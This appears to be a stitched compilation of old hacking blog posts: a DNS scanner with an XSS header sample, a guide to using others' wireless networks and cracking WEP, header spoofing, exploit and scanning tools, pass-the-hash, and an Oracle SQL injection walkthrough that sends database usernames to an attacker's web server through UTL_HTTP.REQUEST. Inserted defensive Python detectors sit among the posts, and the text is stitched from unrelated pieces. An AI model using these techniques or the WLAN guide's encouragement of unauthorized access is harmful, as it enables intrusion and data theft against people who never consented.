Finally, for the web application security folks I added a command to connect to any http servers on port 80 and perform whatever action you put into a configuration file. This is really noisy and really slow (especially on large networks), so I wouldn't recommend trying it unless you have a few hours with nothing better to do, unless you know there are only a handful of machines or have already run this without the connect scan turned on.

perl fierce.pl -dns example.com -connect headers.txt -fulloutput -file output.txt

Here's what a sample header file might look like. The sample file below is attempting to exploit the Expect cross site scripting vulnerability:

GET / HTTP/1.0
User-Agent: Mozilla/5.0
Host:
Expect: This is remote text via xss.js located at ha.ckers.org

Fierce also has wordlist support so that you can supply your own dictionary using the -wordlist keyword. Since the brute force does rely on matching at least a few internal targets, this could be helpful if you know that the naming convention has to do with a certain non-obvious naming convention or uses another language, etc.

perl fierce.pl -dns example.com -wordlist dictionary.txt -file output.txt

Not convinced? Prior to running the scan I had never been to either mail.ru or rambler.ru (a few of the top Alexa sites in Russia). Since I don't read Russian, performing an audit against them is far more difficult. Here's some sample output from the two. In the first example you can see that mail.ru has a non-contiguous address for its mobile.mail.ru than it does for the rest of the site. That would have been very difficult to locate with any other scanner. In the rambler.ru example you can see the RFC1918 space 10.* pop up:


mail.ru - 418 entries and 303 hostnames found.
rambler.ru - 472 entries and 458 hostnames found.

Trust me, we've found far more interesting sites than these two in our tests, but I don't want to disparage any companies for their mistakes. I'm sure you can think of a few companies to test this against. The results can be pretty amazing. If you don't get many results, that could be one of three things, 1) you aren't scanning their corporate domain, you are only scanning their external domain which they only have one or two machines on 2) it's a very small company or 3) you typo'd the domain name (I haven't built any checks to make sure the domain you entered is valid).

Requirements: This is a PERL program requiring the PERL interpreter with the modules Net::DNS and Net::hostent. You can install modules using CPAN:


perl -MCPAN -e 'install Net::DNS'
perl -MCPAN -e 'install Net::hostent'

Windows users: You can use Fierce under Windows if you use Cygwin with PERL and the above two modules installed. I have not tested this using ActivePerl in Windows, so I would recommend Cygwin until ActivePerl can be thoroughly tested. I am/was working on a win32 version of Fierce, but have put the project on hold. If anyone is interested in picking up where I left off, drop me a line.

Version: Fierce is currently at version 0.9.9 - Beta 03/24/2007

Download: fierce.pl

Download: hosts.txt

(Thanks to Robert E Lee for the help with this and to Michael Thumann's DNSDigger wordlist).

Getting started: perl fierce.pl -help

This may have some bugs in it. Also this can be a noisy scanner, but in the tests I've performed it's exceptionally effective at finding non-contiguous IP blocks and new attack points. This should be considered a precursor to nmap, unicornscan or nessus as it gives you enough information to begin a much more thorough scan with one of those other tools. Also, it can point out DNS entries for hosts that are no longer up or have not yet been put into production. Please use Fierce with care and at your own risk.

LANJacking: the New Hacker Mecca

Thursday, December 13, 2007

Getting free Internet access through IEEE standard 802.11b wireless Ethernet LANs (often called Wi-Fi LANs or WLANs) is the newest and biggest ever hacker scene. In many areas you can get free access legally through Wi-Fi systems run by volunteers. Elsewhere, it’s the wild west all over again, with spammers, computer criminals, and mostly harmless hackers running wild on WLANs whose owners have no concept of what they are hosting.

First we will cover the easy stuff: how to break into a WLAN that doesn’t authenticate users (LANJacking). These are fairly common. To do this, get a laptop with a wireless NIC (WNIC). Configure your NIC to automatically set up its IP address, gateway and DNS servers. Then, use the software that came with your NIC to automatically detect and get you online.

For example, with an Orinoco NIC, in Client Manager set the SSID (service set identifier required to be able to exchange packets on that WLAN) to be "any" or "null." Then from the Advanced menu select Site Manager. That should show you all available Wi-Fi access points.

Once you are set up to detect WLANs, then for happiest hunting, start driving (wardriving) or walking (stumbling) around an area with businesses or apartment buildings. Susan Updike points out, "Don’t forget airports – many VIP lounges, etc. have wireless hubs accessible from inside the airport or even in the parking lots."

How do you know when you’ve gotten online? One way is to run an intrusion detection system that alerts you when you get any kind of network traffic.

An easier and faster way to find those access points and choose the one you want to use is to run Network Stumbler, at http://www.netstumbler.com. It shows you all Wi-Fi access points within range of you. Network Stumbler runs on Windows desktop and laptop machines, and Mini Stumbler runs on Wi-Fi-enabled PDAs. Netstumbler-like software is available for MacOSX with either an internal AirPort card or any PCMCIA Wi-Fi card at http://www.mxinternet.net/~markw/.

For NetBSD, OpenBSD, and FreeBSD you can get BSD-Airtools at http://www.dachb0den.com/projects/bsd-airtools.html.

If you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. A version of Kismet is available for Linux; Kismet also supports FreeBSD, OpenBSD and MacOSX.

Following are examples from a wardriving session by William Marchand of UnixHQ (http://www.unixhq.org) using a Windows 2000 Professional laptop and Netstumbler.

Figure 1: Not connected yet.

However, he fires up Netstumbler and lo and behold, he sees Fig. 2.

Figure 2: Bill is within range of a Wi-Fi access point on Channel 6. Details are in the right hand panel.

Figure 3: It looks like a strong signal.

Figure 4: Time to get online!

Figure 5: The deed is done.

As noted above, if you want to locate vulnerable WLANs in wholesale lots, there is an even more interesting tool. At http://www.kismetwireless.net/ you can download Kismet, a WLAN sniffer that also separates and identifies many wireless networks in the area you are testing. The Linux version of Kismet is on the Überhacker CD-rom; Kismet also supports FreeBSD, OpenBSD and MacOSX.


Kismet works with any 802.11b wireless card that is capable of reporting raw packets (rfmon support). These include any Prism2 based card (Linksys, D-Link, Rangelan, etc), Cisco Aironet cards, and Orinoco based cards. Kismet also supports the WSP100 802.11b remote sensor by Network Chemistry and is able to monitor 802.11a networks with cards using the Ar5k chipset. Here’s where it gets interesting. There is a version that allows you to deploy many Kismet sensors for distributed sniffing. Each "drone" sensor sends packets over a TCP connection to a Kismet server. Its output can be piped into Snort (http://www.snort.org) and some other Intrusion Detection Systems (IDS).

You can get an idea of where easy-access Wi-Fi access points exist in abundance at http://www.WiFiMaps.com/ and http://www.wigle.net/maps. If you hunt on foot, keep an eye out for chalk marks on sidewalks or walls. These often denote Wi-Fi access points.

If you would rather hunt while sitting in your hacker lab, you can get into WLANs that are tens of kilometers away by using a directional antenna. http://www.fab-corp.com/ is an example of a place where you can buy these.

There are many commercial products for detecting WLANs. They are often used in companies that have problems with employees setting up unauthorized access points. For example, AirMagnet (http://www.airmagnet.com/) can run on the iPAQ PDA, and detects problems such as a Wi-Fi access point advertising its SSID.

It is legal to detect WLANs, but not to use some of the wireless systems you may access. It is best to make sure a WLAN is open to the public before using it. However, unless it requires some sort of authentication to log on, law enforcement won’t waste time pursuing casual visitors to WLANs. If you do this and get busted anyhow, well, that’s the risk you take in any unauthorized computer access.

Now we come to the slightly hard part. How do you break in if the WLAN asks for some sort of authentication? Wired Equivalent Privacy (WEP) is a common way to authenticate, and can be broken in minutes if you have a computer with a reasonably fast CPU. Since some Wi-Fi hardware is incompatible with better ways than WEP to authenticate, chances are you can find a lot of WEP nets floating around.

Airsnort is an example of a program that cracks WEP keys. Once it has captured enough packets it can usually crack WEP in a second or so, if running on Linux with a reasonably fast CPU. Airsnort has varieties that run on BSD, Linux, OS X and Windows, and can be downloaded at http://airsnort.shmoo.com/.

Now we come to the super hard part: WiFi Protected Access (WPA). It’s the latest, greatest way to keep intruders from abusing Wi-Fi. It can work, for example, with Windows Remote Authentication Dial-In Services to authenticate users – and keep the uninvited out. At this writing no technique has been publicized to break it. However, if by the time you read this, a way has been discovered, here are some web sites that are likely to offer downloads of the tools that do it, and instructions for their use.

http://www.worldwidewardrive.org/

http://www.wardriving.com/

http://www.churchofwifi.com

http://www.nakedwireless.ca/

https://mailsrv.dis.org/mailman/listinfo/wardriving

This Guide has been excerpted from the upcoming Second Edition of Überhacker! How to Break into Computers, by Carolyn Meinel. You are welcome to post this Guide to your web site or forward it to other people. Happy hacking!

How to Fake out Web Servers

Did you know that most web browsers dutifully identify themselves to every web site you visit? There's often a good reason for this. Some web sites will send you pages customized to give you better viewing with the type of browser you use. Some sites use your header information to choose what language to display. Some intrusion detection techniques even look at headers to get an idea whether a connection to a website is being made by a legitimate browser or by a clumsily programmed attack.

If it bugs you to tell web sites everything your browser wants to tell them, here's how to fake them out.

Telnet! Yes, my favorite all purpose mostly harmless hacking technique is telnet. If you use Windows and have never used telnet, type Start --> Run --> type telnet in the window and hit enter. This will give you a black window with something like this in it:

Welcome to Microsoft Telnet Client.

Escape character is 'CTRL+]'

Microsoft Telnet>

Now here's a fun thing to do. At the telnet prompt, type "open happyhacker.org 80" . Now wait a few seconds and then hold down the Ctrl key and the c key with one hand and hit enter with the other.

This will give you something like:

HTTP/1.0 408 Request Timeout
Server: thttpd/2.20c 21nov01 on a Brickserver 2
Content-type: text/html
Date: Wed, 31 Jan 2007 13:23:03 GMT
Last-modified: Wed, 31 Jan 2007 13:23:03 GMT
Accept-Ranges: bytes
Connection: close

408 Request Timeout


No request appeared within a reasonable time period.



thttpd/2.20c 21nov01 on a Brickserver 2


Connection to host lost.

Now to get something better, instead you can type Start --> Run and type in "cmd". This gives an MSDOS window and it looks something like this:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Carolyn Meinel>

From here we can do something much more fun to unsuspecting webservers. Open Notepad and type this in two lines:

telnet happyhacker.org 80
GET /gtmhh/index.shtml

It won't work unless you have this in two lines! Next copy these two lines and at the MSDOS window prompt right click, choose paste, and then hit enter. This will display all the code that the webserver would normally send your browser.

OK, so why is this a big deal? You can get the same code just by using the "page source" command on your browser. However, you got this code without having to send the browser any extra headers. All you sent was the most basic web browser command, the "GET" command.

Even more important...!!!

You can go to jail warning: If you send a webserver a command that is designed to break into or crash it, you just might wind up being cellmate Spike's girlfriend. Yes, those nasty script kiddie websites offer exploits to send to webservers, and if you try them on about a thousand different websites you may eventually get unlucky and actually break in.

If you want to try out all sorts of weird commands against a webserver without breaking the law, you have permission to do it against this website, happyhacker.org and you can't get into any trouble because I own it and I set the rules, which are, basically, you can do anything you want, see if you can crash happyhacker.org or break in, it's OK with me, muhahaha!

Next, you can set up your web browser to send headers of your own design. This article by Eric Giguere is still useful for learning how to modify your browser's headers. He also has a link that displays a portion (not the entire thing) of your browser's headers. Using this link, I learn that my browser sent out this:

connection keep-alive
accept-language en-us,en;q=0.5
content-length 0
host www.ericgiguere.com
accept text/xml,application/xml,application/xhtml+xml,
text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
accept-charset ISO-8859-1,utf-8;q=0.7,*;q=0.7
keep-alive 300
cookie JSESSIONID=5CF0B8F73EB94ECA1D6AA324F2AA1ADC; __utma=13
5980773.912983502.1170270059.1170270059.1170270059.1;
__utmc=135980773;
__utmz=135980773.1170270059.1.1.utmccn=(organic)
utmcsr=googleutmctr=
change+browser+headers+Firefoxutmcmd=organic
user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
You can tell this doesn't show everything because it doesn't include the "GET" command.

Now let's say you would like to see absolutely everything your browser sends. You can do this by setting up a network sniffer on your own computer and using it to see everything that goes back and forth between your browser and a website. This can be especially interesting if you visit malicious websites, meaning those that try to break into your computer through your browser to install spyware and even worse Trojans that enable criminals to hide their nasty activities inside your computer. Check out http://www.winpcap.org/ to learn about sniffers and for free downloads of sniffer tools.

Last but not least, you can see what your headers look like by installing the free Apache webserver on your home computer. You can direct your browser to it by typing "localhost" or "127.0.0.1" into your browser or your telnet connection.

In order to ensure that your Apache webserver saves the headers of your browser, you have to find the file named httpd.conf. Open it in Notepad and look for the line:

CustomLog logs/agent.log agent

If there is a "#" in front of it, this means Apache ignores it. If you delete the "#", Apache will record the headers of visiting browsers, but only after you restart Apache. Then, after visiting it with your browser, you will find your headers in the agent.log file in the logs directory.

Of course after reading all this, you may wonder what the big deal is about forging headers. Or maybe you think this is super fun, in which case you must be a real hacker.

OK, so now let's go do fun stuff with the free Firefox browser. In the browser window type:

about:config

Scroll down the screen this displays to general.useragent.extra.firefox and double-click on that line. You can change it to whatever you want. I change it from Firefox/2.0.0.1 to Lynx. Yes, most of you are too young to remember Lynx, but I'm a really, really ancient hacker, and back when the Web was young we didn't have pictures and all that newfangled fancy stuff. The web was just words and links, and Lynx, which we ran from a Unix shell account (this was before Linux even!), was how we crawled the web.

Next I double-click on general.useragent.locale and change en-US (meaning I want to see websites in English if they offer that option) to en-Lower Slobovia.

Oh, pooh, it turns out all this does is change one of my headers to:

user-agent Mozilla/5.0 (Windows; U; Windows NT 5.1; Lower Slobovia; rv:1.8.1.1) Gecko/20061204 Lynx

This failure to totally fubar the headers tells me we can have much more fun if we use telnet or even netcat to directly connect to webservers. Then we finally can really, really fake out anyone who actually reads the logs.

You can get punched in the nose warning: Many intrusion detection and prevention systems look for really screwy browser headers. Make yours weird enough and you will make someone hopping mad -- and he or she might tell your online provider that you, yes you, sent evil headers. Yes, you can be tracked back to your home computer. If your online provider is terrified of hackers (could you actually be an evil, evil, criminal?) they might cancel your Internet service.
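The kind of header check such an intrusion detection system might run, as an added example that is not part of the original article: it parses a raw request the way a web server receives it and flags the bare telnet-style GET, a missing User-Agent or Accept header, and the malformed locale field and unknown product token in the edited Firefox UA shown above. The three sample requests are constructed for this example from the header values listed on the page.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample requests for this example (not captures from the article).
# 1) The bare "GET" the article pastes into telnet: no version, no headers.
TELNET_REQUEST = b"GET /gtmhh/index.shtml\r\n"

# 2) An ordinary Firefox 2 request, assembled from the header values the article lists.
FIREFOX_REQUEST = (
    b"GET /gtmhh/index.shtml HTTP/1.1\r\n"
    b"Host: happyhacker.org\r\n"
    b"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) "
    b"Gecko/20061204 Firefox/2.0.0.1\r\n"
    b"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,"
    b"text/plain;q=0.8,image/png,*/*;q=0.5\r\n"
    b"Accept-Language: en-us,en;q=0.5\r\n"
    b"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
    b"Keep-Alive: 300\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

# 3) The same browser after the about:config edits described in the article.
SPOOFED_REQUEST = (
    b"GET /gtmhh/index.shtml HTTP/1.1\r\n"
    b"Host: happyhacker.org\r\n"
    b"User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; Lower Slobovia; rv:1.8.1.1) "
    b"Gecko/20061204 Lynx\r\n"
    b"Accept-Language: en-us,en;q=0.5\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
)

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+)(?: (HTTP/\d\.\d))?$")
# Language tag such as "en-US"; "Lower Slobovia" does not match this shape.
LANG_TAG = re.compile(r"^[A-Za-z]{2,3}(?:-[A-Za-z0-9]{2,8})*$")
# Gecko-era UA: Mozilla/5.0 (<platform fields>) Gecko/<build> <product>
GECKO_UA = re.compile(r"^Mozilla/5\.0 \(([^)]*)\) Gecko/\d+ (\S+)")
KNOWN_GECKO_PRODUCTS = ("Firefox/", "Netscape/", "SeaMonkey/")


def parse_request(raw: bytes) -> Tuple[str, str, Optional[str], Dict[str, str]]:
    """Split a raw request into (method, path, version, lower-cased headers)."""
    lines = raw.split(b"\r\n")
    m = REQUEST_LINE.match(lines[0])
    if not m:
        raise ValueError("not an HTTP request line: %r" % lines[0])
    method, path, version = (g.decode("ascii") if g else None for g in m.groups())
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line:  # blank line ends the header block
            break
        name, _, value = line.decode("latin-1").partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, version, headers


def header_findings(raw: bytes) -> List[str]:
    """Return the anomalies an IDS-style header check would raise for one request."""
    _method, _path, version, headers = parse_request(raw)
    findings: List[str] = []
    if version is None:
        findings.append("http09_request")  # bare "GET /path", as typed into telnet
    elif version == "HTTP/1.1" and "host" not in headers:
        findings.append("missing_host")
    ua = headers.get("user-agent")
    if ua is None:
        findings.append("missing_user_agent")
        return findings
    gecko = GECKO_UA.match(ua)
    if gecko:
        fields = [f.strip() for f in gecko.group(1).split(";")]
        product = gecko.group(2)
        # Field 4 of the platform list is the locale that general.useragent.locale edits.
        if len(fields) >= 4 and not LANG_TAG.match(fields[3]):
            findings.append("malformed_ua_locale")
        # general.useragent.extra.firefox replaced "Firefox/2.0.0.1" with "Lynx".
        if not product.startswith(KNOWN_GECKO_PRODUCTS):
            findings.append("unknown_gecko_product")
    if "accept" not in headers:
        findings.append("missing_accept")  # real browsers always send one
    return findings


if __name__ == "__main__":
    for name, req in (("telnet", TELNET_REQUEST), ("firefox", FIREFOX_REQUEST),
                      ("spoofed", SPOOFED_REQUEST)):
        print(name, header_findings(req) or "clean")
```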

But let's get back to that Firefox about:config screen. Have you ever tried to enter a really weird URL you found on a hacker website into your browser and it didn't do what you expected? Your browser might be the culprit. Check out:

network.IDN.blacklist_chars

It lists all the characters your browser ignores. Many of these aren't even on your keyboard, although you can create them with a hex editor. Some of them you can't send through telnet, either. The ultimate solution to all that is netcat, a telnet-like program that is also good for lots of amazing things. If you try really hard, netcat can enable you to do truly amazing "you can get punched in the nose" or "you can go to jail" stuff to webservers. Your choice.

Happy hacking!

MSF eXploit Builder - Free Win32 Exploit Development Platform
The MSF eXploit Builder (MSF-XB) is a free win32 application (GUI) that wants to be an Exploit Development Platform. The main goal is to speed up the exploit development process, this is accomplished by using the powerful functionalities and neat design of The Metasploit Framework.

MSF-XB automatically generates MSF-compliant exploit modules.

The MSF-XB package also includes for your convenience:

Fuzzers

TAOF, The Art Of Fuzzing v0.3.2
ProxyFuzz v0.1, Rodrigo Marcos
FileFuzz v1.0.2510.28439, iDefense
FTPfuzz v1.0, Infigo
WinFuzz v1.0.0.1, Fakehalo

Handy Tools

Findjmp2, Class101
branchseeker
Faultmon
mycrc
Sysinternals (Microsoft) PStools
wget.exe, GNU
xCmd (remotexec clone)
nc.exe
A local database of opcodes/return addresses (Cross-platforms, 10 locales, fast and reverse queries)
An ASCII table
A lot of converters (Ascii, Hex, Byte, Unicode …)
Malcode Analyst Pack v0.2
Process Stalker, iDefense

REQUIREMENTS

Please edit and customize the MSF-XB.INI file
MSF-XB requires the Metasploit Framework installed to work properly (http://www.metasploit.com ): Version 3 is recommended
MSF-XB requires a debugger to be installed (Immunity Debugger)
You can download MSF eXploit Builder here:

MSF-XB.EXE (84Mb)
MD5 41e83b8cb8d60d689bff191eb7842fc1
SHA1 1cb0e457c9fa59da8f147a96afb9c1a056a4e655

scanrand - Download Stateless TCP Scanner with Syn Cookies

Scanrand is an extremely quick and effective port scanner. It works by forking two distinct processes:

One to send the initial queries
One to receive responses and reconcile them from the above
This makes it extremely fast.

If you haven’t heard of the suite, Scanrand is one of the five tools in Paketto Keiretsu by Dan “Effugas” Kaminsky of Doxpara Research.


Scanrand implements numerous options; reasonable defaults are selected when no specific guidance is received from the user. The only thing mandated is a target destination, which may be specified using either a FQDN (Fully Qualified Domain Name) or a numeric specification.

These numerics may employ any number of dashes, commas, or combination thereof at the same time. For example, scanrand 10.0.1-255.1-10,20:80,137-139 works fine.

More ports will be scanned by default when scanning a single host than when scanning a network. Scanrand is able to estimate remote hopcount by examining incoming TTLs.

Note: to install scanrand you first need to install the provided libnet, libtomcrypt and libpcap tarballs.

It’s a good alternative to nmap for certain purposes.


You can read a good article on Scanrand here:

Scanrand Dissected: A New Breed of Network Scanner

The article includes nmap vs scanrand.

You can download Scanrand here (as part of Paketto):

-1.1paketto0.tar.gz

Serious flaws in players from microsoft and aol

It looks like there is a fairly serious vulnerability in some of the popular media player packages out in the wild, delivered as an MP4 file (due to the MP4 codec from 3ivx). It affects Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5.

All the more reason to use VLC! This follows fairly shortly after a couple of quite serious vulnerabilities in Quicktime.


Security researchers are warning that popular media players offered by Microsoft and AOL are vulnerable to attacks that can completely compromise a user’s PC.

Attack code has already been released for the bug, which has been confirmed in a codec used by older versions of Windows Media Player, made by Microsoft, and in AOL’s Winamp. A Symantec researcher has warned that users of other players may also be at risk because the vulnerability itself resides in a commonly used MP4 codec produced by a company called 3ivx Technologies.

“The exploit works by supplying victims with a maliciously formed MP4 file,” Raymond Ball wrote for Symantec’s DeepSight Threat Management System. “When a victim unknowingly clicks a link that appears safe, the MP4 content is delivered, causing the exploit to run.”

At least it’s not Microsoft’s fault this time, but they did use a dodgy codec, so I guess some of the blame lies with them, right?

They could have checked it out properly before bundling it into their software.


A researcher who goes by the name SYS 49152 released exploit code here, here and here that targets Windows Media Player 6.4 and Windows Media Player Classic, which are made by Microsoft, and AOL’s Winamp version 3.5. Each uses the 3ivx MP4 codec, which is vulnerable to a stack overflow.

Secunia describes the Windows Media Player vulnerabilities as “highly critical,” the second-highest rating on Secunia’s five-tier scale. The vulnerability reporting service didn’t have a rating for the Winamp vulnerability.

No patch is available. Ball recommends users remove the codec or disable media players that use the MP4 codec until the hole is plugged. That strikes us as overkill. Taking care not to click on suspicious links in browsers and email programs should suffice.

So watch out, attack vectors are getting more varied - don’t let your guard down during this merry season.

Exaggerating timing attacks results via get flooding

I was thinking of an actually useful application for GET request flooding this evening. Normally we only think of GET requests as a binary thing: one at a time or flooding. But what if we launched only enough GET requests to impact server load, not bandwidth latency? Picking the right URL would be critical here (DB impacts, most likely).

When you found the right URL, launching a GET request flood against the server could seriously delay certain types of requests (especially if they must touch a database two times versus one time, for instance - if the DB was part of the flooding). Suddenly something that is normally the difference of a few microseconds could be the difference of seconds. Who cares? Because I’m always curious if there are any practical applications in hacking for DoS and this appears to be one of them - at least in theory.

Pass the hash, NTLM style

Way back in 1997, a Windows exploit named "NT Pass the Hash" was posted on Bugtraq. This Unix-based tool was a modified SMB client that lets you use captured LanMan hashes, without having to decrypt them first.

After a mere ten years, someone has finally modernized this concept into a much more potent attack. Core Security has released Pass-The-Hash Toolkit, which runs on Windows and works with NTLM hashes. It's comprised of two key modules:

IAM.EXE - This tool "injects" another user's NTLM credentials into your current Windows logon session, given their username, Windows domain, and NTLM hash. You can then use the 'net' tools or any other Windows software that authenticates via NTLM, all under the assumed privileges of the compromised user account.
WHOSTHERE.EXE - Lists the usernames and NTLM hashes of all users logged on to a system.

No password cracking required! So if you own other systems on the network, you can just run whosthere.exe on them until you snag a domain admin's hashes. Or you could use a man-in-the-middle attack, like the WPAD proxy exploit. As I discussed a few posts ago, the Metasploit guys covered several methods for grabbing NTLM hashes in their Tactical Exploitation presentation at BlackHat.

Out-of-band Oracle SQL injection with HTTP Requests

I spent most of last week performing a web application assessment in the middle of nowhere, Alabama. After the mad fun at BlackHat and several weeks of unpleasant documentation work preceding it, it was a nice change to spend five peaceful days completely focused on testing an interesting system.

This was an internal application, so I wasn't surprised to find that it was vulnerable to SQL injection in several areas. However, in-band injection attacks weren't working for the application I was testing - I couldn't use UNION SELECTs, for example, to merge my query results with data rendered in the browser. So I had to leverage an out-of-band technique for retrieving data through SQL injection: Oracle's UTL_HTTP.REQUEST function. David Litchfield mentioned this approach almost two years ago in Data-mining with SQL Injection and Inference, but I never had the need to use it "in the wild" until now.


UTL_HTTP is a built-in Oracle SQL function that issues HTTP requests. The syntax is pretty simple:

UTL_HTTP.REQUEST('http://www.foo.com/index.php')

returns the first 2000 bytes from the provided URL. But the clever bit is that you can concatenate the URL with another SQL statement, the results of which will become part of the request.

For example, consider the following SQL:

UTL_HTTP.REQUEST('http://www.foo.com:80/'||(SELECT USERNAME FROM DBA_USERS WHERE ROWNUM=1))

The SELECT statement returns the value "SYS" - the first user in the DBA_USERS table. The HTTP request issued by the database is therefore for the URL "http://www.foo.com:80/SYS". In www.foo.com's HTTP access log, the request would look like:

158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
(assuming 158.72.4.21 is our target DB server)


So as an attacker, you simply need to run a web server and point the UTL_HTTP.REQUESTs to your own IP address. You can then view the result of each SQL injection in your server logs. If in Windows, I like to use SHTTPD as it is lightweight and simple to turn on and off.


The biggest limitation of this approach is that you can only query for one row at a time: you'll get an error message if your statement returns multiple rows. (That is due to the UTL_HTTP.REQUEST function itself, not the web server end.) But it is still a lot more efficient than using blind SQL injection to brute-force one character of a response at a time. Oracle will also throw an error if it can't reach your web server, which may be the case depending on network controls between yourself and the database. Experiment with running on different ports.


There are probably a few things you could do to make the attack more elegant, like setting up a CGI script on your server to better collect and parse the calls from the database. You could also create and inject a PL/SQL function that concatenates results from multiple rows to get around the single-row limitation. I needed a quick and dirty solution to get a few key database records, so I didn't bother venturing beyond the basics for this test.


Outbound HTTP requests originating from a database server should look suspicious, but I think the attack is obscure enough to slip by most admins.
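A check an admin could run over web server access logs in the format shown above, as an added example that is not part of the original post: it flags every request whose source address belongs to a database server network and recovers the value that the injected SELECT concatenated onto each URL, one row per request. The log lines, the 158.72.4.21 database address and the 10.20.30.40 client are constructed samples.

```python
import re
from ipaddress import ip_address, ip_network
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed sample access log in the format of the article's example line
# (not a real capture). 158.72.4.21 plays the database server that was made to
# issue UTL_HTTP.REQUEST calls; 10.20.30.40 is an ordinary browser client.
FIREFOX_UA = ('"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1) '
              'Gecko/20061204 Firefox/2.0.0.1"')
SAMPLE_LOG = f"""\
10.20.30.40 - - [08/Aug/2007:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 512 "-" {FIREFOX_UA}
158.72.4.21 - - [08/Aug/2007:10:02:40 +0000] "GET /SYS HTTP/1.1" 404 0 - -
158.72.4.21 - - [08/Aug/2007:10:02:41 +0000] "GET /SYSTEM HTTP/1.1" 404 0 - -
158.72.4.21 - - [08/Aug/2007:10:02:43 +0000] "GET /ACME%20CORP HTTP/1.1" 404 0 - -
10.20.30.40 - - [08/Aug/2007:10:03:05 +0000] "GET /SYS HTTP/1.1" 404 0 "-" {FIREFOX_UA}
this line is not an access log record
"""

# Common log format with an optional referer / user-agent pair, which may be
# quoted strings (combined format) or bare "-" as in the article's example.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-)'
    r'(?: (?P<referer>"[^"]*"|-) (?P<ua>"[^"]*"|-))?'
)


def parse_log_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one access log line; None if it is not a request record."""
    m = LOG_LINE.match(line)
    return m.groupdict() if m else None


def find_db_egress(log_text: str, db_networks: List[str]) -> List[Dict[str, str]]:
    """Flag requests whose source lies in one of the database server networks.

    Each hit carries the request path with the leading "/" removed and URL
    decoded, which is exactly the value the injected SELECT appended to the URL.
    """
    nets = [ip_network(n) for n in db_networks]
    hits: List[Dict[str, str]] = []
    for line in log_text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        try:
            src = ip_address(rec["ip"])
        except ValueError:  # a hostname was logged instead of an address
            continue
        if not any(src in net for net in nets):
            continue
        hits.append({
            "ip": rec["ip"],
            "time": rec["time"],
            "status": rec["status"],
            "leaked": unquote(rec["path"].lstrip("/")),
        })
    return hits


def leaked_values(log_text: str, db_networks: List[str]) -> List[str]:
    """The values pulled out one row per request, in log order."""
    return [h["leaked"] for h in find_db_egress(log_text, db_networks)]


if __name__ == "__main__":
    for hit in find_db_egress(SAMPLE_LOG, ["158.72.4.0/24"]):
        print(f'{hit["time"]} {hit["ip"]} -> {hit["leaked"]!r} (HTTP {hit["status"]})')
```

The 404 status on every hit is itself a tell: the database is not fetching a page, it is only using the request path as a carrier.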

Hijacking dns

Restricting access to specific Internet web services is a challenge shared by all network administrators. Whether the reason for restricting access is based on security, bandwidth, or productivity, installing and maintaining proxy and content filter applications may be outside the budget of a small IT department.

The solution provided here offers a cumbersome approach for a small investment: $0.

All web services, such as HTTP, FTP, IRC, IM, NNTP and SMTP are predominantly called by name when end users want to access them. An internal DNS server usually hosts records for only the internal namespace. All external (Internet) namespace is generally forwarded to an ISP’s or other DNS server.

DNS hijacking on the LAN allows an administrator to redirect all Internet requests for a domain or server to an internal server or to nowhere (127.0.0.1).

HIJACKING GOOGLE

If an administrator wanted to hijack and redirect all users’ connections to google.com, he’d only need to add a Primary Lookup Zone for the domain name.

The steps for Server 2003 are as follows:

- Open the DNS console
- Expand your server
- Right-click Forward Lookup Zones and select New Zone.
- Click Next on the Wizard welcome page.
- Create a Primary Forward Lookup Zone. Do NOT integrate the zone with Active Directory if the option appears.
- Type the name of the zone: google.com
- Accept the default file name for the zone and click Next.
- Click Next.
- Click Finish.

Your DNS server is now authoritative for google.com. Instead of forwarding your clients’ DNS queries to the ISP DNS server, the server returns any records it holds in its own database. If the requested record does not exist, the DNS server tells the client that the name does not exist.

CREATE RECORDS

Create host records for the default namespace (i.e. google.com) and any hosts that you want to redirect (e.g. www.google.com). If you simply want the connections to die, saving any Internet bandwidth that would have otherwise been used, set the IP Address for each host record to 127.0.0.1. This will cause a client machine to attempt to connect to itself instead of the requested server. In most cases, this simply returns an error to the application that requested the Internet server.

Mail can be redirected by creating an MX record in the Zone you’ve chosen to hijack.

GETTING FANCY – REDIRECTION TO A BANNED ACCESS PAGE

An administrator can redirect all web requests to hijacked servers to an internal web page that reiterates the network policy. For example, when a user browses to www.google.com, he instead reaches a web page that proclaims, “You attempted to access an inappropriate web page. This action has been logged.”

If you want to get really sophisticated, you can use ASP.NET to build a neat page that reads the HTTP request and user token to personalize the page. If you are a masochist, you can tie it to a SQL database and log all transgressions.

CREATING THE BANNED ACCESS PAGE

- Install the Windows Web Service (Add/Remove Programs>Add/Remove Windows Components>Application Server)
- In C:\inetpub\wwwroot drop a web page saying nasty stuff to your end users. Name it default.html.
- Use this server’s IP address instead of 127.0.0.1 for all records you’d like to hijack.

BAD SOLUTION – GOOD PRICE

